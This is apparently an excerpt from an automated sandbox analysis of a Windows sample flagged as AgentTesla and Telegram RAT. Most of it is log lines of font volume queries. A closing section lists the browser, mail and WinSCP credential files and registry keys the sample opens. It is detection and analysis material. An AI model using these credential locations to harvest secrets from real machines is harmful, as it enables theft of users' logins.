            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9F120 GetUserNameW,

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR

            Mitre Att&ck Matrix

